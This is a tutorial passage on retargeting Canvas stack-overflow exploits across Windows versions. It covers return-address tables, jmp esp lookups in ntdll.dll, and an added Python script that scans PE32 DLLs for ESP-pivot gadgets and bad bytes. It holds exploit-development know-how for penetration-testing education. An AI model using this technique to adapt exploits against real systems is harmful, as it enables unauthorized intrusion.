Porting Exploits Within Canvas

Porting an exploit from one OS version to another can be very easy or extremely difficult. Porting between language builds of the same OS version (e.g., from English to French Windows XP SP1) is usually one of the easiest tasks, since the code logic is the same and mainly the addresses inside the localized system DLLs differ. Porting to a substantially different OS version (such as from Windows NT4 to Windows Server 2003) depends on how much changed between the two. Back porting to an older version is generally easier than porting to a newer one, since Microsoft tends to tighten security with each service pack: the service exploited on Windows XP SP0 may simply no longer be exposed, or the bug may already be fixed, on SP1.

If there is no major code change between the two versions, adapting the return address can be enough: each service pack and language build ships its own copies of the system DLLs, so the jmp esp you return through sits at a different address even when the vulnerable code is identical. Most Canvas exploits have a version table such as the one shown next, mapping each supported OS version to the return address used for it. To use a given exploit on another OS version or language without completely rewriting it, sometimes all you need to do is add an entry with the right return address for your target. For example:

# Operation Name & version, jmp esp
self.versions[1]=("Windows XP EN sp0",0x77f5801c)
self.versions[2]=("Windows 2000 EN sp0",0x77f8948b)

It is always a good policy to be ready to port an exploit to a new OS version or to another language version. Look for information in the OpCode Database from the Metasploit Project (see Chapter 7); at the time of writing it covers all major libraries for Windows NT4 through 2003. You can access the database at http://www.metasploit.com/opcode_database.html. The Display Supported Modules page of the OpCode Database shows that ntdll.dll has a base address of 0x77f50000 on the Windows XP SP0 target of the first table entry (the base differs between OS versions, which is why the addresses must be looked up per target). What you need next is a jmp esp in ntdll.dll for the other OS version. Querying for that opcode in ntdll.dll returns results for OSes ranging from NT4 to 2003, including:

...

0x77f5801c jmp esp ntdll.dll
(English / 5.1.2600.0) Windows XP 5.1.0.0 SP0 (IA32)

0x77f77343 jmp esp ntdll.dll
(English / 5.1.2600.0) Windows XP 5.1.0.0 SP0 (IA32)

0x77f8948b jmp esp ntdll.dll
(English / 5.0.2163.1) Windows 2000 5.0.0.0 SP0 (IA32)
(French / 5.0.2163.1) Windows 2000 5.0.0.0 SP0 (IA32)

0x77fa59cc jmp esp ntdll.dll
(German / 5.1.2600.11061) Windows XP 5.1.1.0 SP1 (IA32)

0x7c951eed jmp esp ntdll.dll
(German / 5.1.2600.21802) Windows XP 5.1.2.0 SP2 (IA32)

...

Adding a German XP SP1 target can be as easy as adding the following entry to the table. Use a new index: reusing index 2 would silently overwrite the Windows 2000 entry.

self.versions[3]=("Windows XP sp1 German",0x77fa59cc)
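The query above lets the OpCode Database do the search for you. As an added example that is not part of the original text, of Canvas, or of the Opcode Database, the following Python script does the same search locally on a 32-bit DLL copied from the target (for instance the ntdll.dll of the service pack and language you are porting to): it parses the PE section table, scans only executable sections for jmp esp, call esp and push esp; ret, converts each file offset to a virtual address using the preferred image base, and flags candidates whose address contains bytes (NUL, LF, CR by default) that a typical input path will not deliver. The tiny PE image built by build_sample_image() and the default bad-byte set are constructed for the demonstration; they are not a real ntdll.dll or a Canvas convention.

```python
import struct

# Byte patterns for the pivots a classic Windows stack-overflow exploit
# returns into: each lands execution on the shellcode that sits at ESP.
GADGETS = {
    b"\xff\xe4": "jmp esp",
    b"\xff\xd4": "call esp",
    b"\x54\xc3": "push esp; ret",
}
IMAGE_SCN_MEM_EXECUTE = 0x20000000


def parse_pe32(data):
    """Return (image_base, sections) from a PE32 image; each section is
    (name, rva, raw_offset, raw_size, characteristics)."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4                      # IMAGE_FILE_HEADER, 20 bytes
    nsections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20                          # IMAGE_OPTIONAL_HEADER
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 (32-bit) images are handled here")
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    sections = []
    for i in range(nsections):
        hdr = opt + opt_size + 40 * i        # IMAGE_SECTION_HEADER, 40 bytes
        name = data[hdr:hdr + 8].rstrip(b"\0").decode("ascii", "replace")
        _vsize, rva, raw_size, raw_off = struct.unpack_from("<IIII", data, hdr + 8)
        chars = struct.unpack_from("<I", data, hdr + 36)[0]
        sections.append((name, rva, raw_off, raw_size, chars))
    return image_base, sections


def find_gadgets(data, executable_only=True):
    """Scan the raw bytes of each section for GADGETS and return sorted
    (virtual_address, mnemonic, section_name) tuples, assuming the image
    loads at its preferred base (true for the NT4 to 2003 targets above)."""
    image_base, sections = parse_pe32(data)
    hits = []
    for name, rva, raw_off, raw_size, chars in sections:
        if executable_only and not chars & IMAGE_SCN_MEM_EXECUTE:
            continue                         # bytes in .data are not a usable return target
        blob = data[raw_off:raw_off + raw_size]
        for pattern, mnemonic in GADGETS.items():
            pos = blob.find(pattern)
            while pos >= 0:
                hits.append((image_base + rva + pos, mnemonic, name))
                pos = blob.find(pattern, pos + 1)
    return sorted(hits)


def has_bad_bytes(addr, bad=b"\x00\x0a\x0d"):
    """True if the little-endian encoding of addr contains a byte the
    vulnerable input path will not pass through (NUL, LF, CR by default;
    the real set depends on the protocol being exploited)."""
    return any(b in bad for b in struct.pack("<I", addr))


def build_sample_image():
    """Constructed stand-in for a system DLL (not a real ntdll.dll): a
    minimal PE32 with one .text and one .data section, preferred base
    0x77f50000, so the sample addresses resemble the XP SP0 entries above."""
    image_base = 0x77F50000
    text = bytearray(b"\x90" * 0x200)
    text[0x1C:0x1E] = b"\xff\xe4"            # jmp esp at RVA 0x101c
    text[0x40:0x42] = b"\x54\xc3"            # push esp; ret at RVA 0x1040
    data = bytearray(0x200)
    data[0x10:0x12] = b"\xff\xe4"            # same bytes in .data: must be skipped
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew -> PE signature at 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 96, 0x2102)
    opt = bytearray(96)                      # PE32 optional header, no data directories
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<I", opt, 28, image_base)

    def section(name, rva, raw_off, raw_size, chars):
        return struct.pack("<8sIIIIIIHHI", name, raw_size, rva, raw_size,
                           raw_off, 0, 0, 0, 0, chars)

    headers = (bytes(dos) + b"PE\0\0" + coff + bytes(opt)
               + section(b".text", 0x1000, 0x200, 0x200, 0x60000020)
               + section(b".data", 0x2000, 0x400, 0x200, 0xC0000040))
    return headers.ljust(0x200, b"\0") + bytes(text) + bytes(data)


if __name__ == "__main__":
    import sys
    image = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_image()
    for va, mnemonic, sect in find_gadgets(image):
        flag = "  (contains bad bytes)" if has_bad_bytes(va) else ""
        print("0x%08x %-14s %s%s" % (va, mnemonic, sect, flag))
```

Run it with the path of the target's DLL to list candidates, verify the chosen one in a debugger on the actual target (the file you copied must be the exact build the target runs, since a hotfix can move every gadget), and then add it to self.versions under a new index. The preferred-base assumption holds for the NT4 through 2003 targets listed above; on a DLL that has been rebased, the section RVAs stay valid but the base must be taken from the loaded module instead of the header.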